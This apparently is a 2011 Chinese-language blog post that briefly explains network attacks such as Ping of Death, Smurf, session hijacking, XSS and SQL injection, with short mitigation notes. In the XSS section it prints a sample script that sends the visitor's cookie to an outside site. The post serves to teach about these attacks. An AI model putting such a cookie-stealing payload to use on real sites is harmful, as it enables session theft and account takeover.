3月 26, 2011

網路攻擊 (Network Attacks)

1.Ping of Death:
ICMP Echo Request/Reply的封包格式包括Option Data這一部分,雖然其內容可有可無,但是當Echo Request包含此部分資料時,接收端必須將這些資料原封不動的包含在Echo Reply中回送給發送端,雖然沒有明定封包的大小,但是小於65535 bytes的封包才算合法。

只要刻意地將Echo Request的Option Data塞入大量資料,便可以造出超過65535 bytes的TCP/IP封包,當它送入被攻擊端的電腦時,由於作業系統本身無法處理這種變形封包,因此會造成當機的狀況。

2. Smurf攻擊:
TCP/IP對網路定址的定義中,有一個位址是用來廣播此網段上全部電腦,這就是我們所稱的廣播(broadcast)位址,定義為將子網路的bit全部設為1。所有連接此網路的網路卡都會將此封包接收進主機中,對此封包進行回應或處理。

攻擊者會先假冒目標主機(受害者)之名向中介者(router)發出broadcast的ICMP Echo Request封包,因為是目的地是廣播位址,中介者在收到之後會對該區域網段內的所有電腦發出此ICMP封包,而所有的電腦在接收到此訊息之後,會對來源主機(亦即被假冒的攻擊目標)送出ICMP Echo Reply回應,所有的ICMP封包在極短的時間內湧入目標主機內,不但造成網路壅塞,更會使目標主機因為無法反應如此多的系統中斷(interrupt)而導致當機、暫停服務

3. Teardrop
4. TCP SYN flood
5. UDP flood

6. Session Hijack
入侵者在正常用戶登入主機並完成身份確認後,即進行連線截奪,讓合法使用者跟主機間的連線中斷,入侵者的電腦取代合法使用者與遠端主機進行連結,入侵者可存取使用原合法使用者所有有權限存取的任何資源

7. 跨網站攻擊程式(XSS, Cross-site scripting)
針對網站應用程式設計不夠嚴謹,攻擊者在網頁中塞入惡意語法,雖然表面上可能如同正常頁面運作,但在背後可以藉機取得用戶的資料。嚴重者可以透過 cookies 擷取,讓能夠讓攻擊者,取得網站管理權限。

例子1

<a href="/usercp.php?action=logout">一個關於貓的網頁</a>

當 其他人點選連結,他們以為會看到一個關於貓的網頁,卻會因此登出這個網站。

例子2

<script>
location.replace('http://rickspage.com/?secret='+document.cookie) </script>


當 Joe 瀏覽留言板時,他就會被引導到 Rick的網站。
而且連線資訊 cookie 當作網址的一部分,傳遞到 Rick 的網頁伺服器。
Rick 接著就可以透過這個來自 Joe 瀏覽器的 cookie 以 Joe 的帳號瀏覽 Joe 的網站

[ 防治 ]
避免XSS的方法主要是將使用者所提供的內容進行過濾

8. SQL injection
稱為 SQL 指令植入式攻擊,只要提供使用者輸入介面,又沒有做到安全的輸入資料型態
管制,就有可能會遭受這種行為的攻擊。

[ SQL帳號設定 ]
設定一般使用者權限,攻擊者只能掌控被攻陷的那個使用者的資料庫
最差狀況下, 攻擊者也只能夠閱讀或寫入被攻陷的那個使用者的表格

[ 網頁程式撰寫 ]
過濾輸入條件中可能隱含的sql指令,如 INSERT、SELECT、UPDATE 等
針對特殊的查詢參數進行過濾,如--、 ' 等

[ 網站伺服器方面 ]
定期修補作業系統與網站伺服器的漏洞

沒有留言:

張貼留言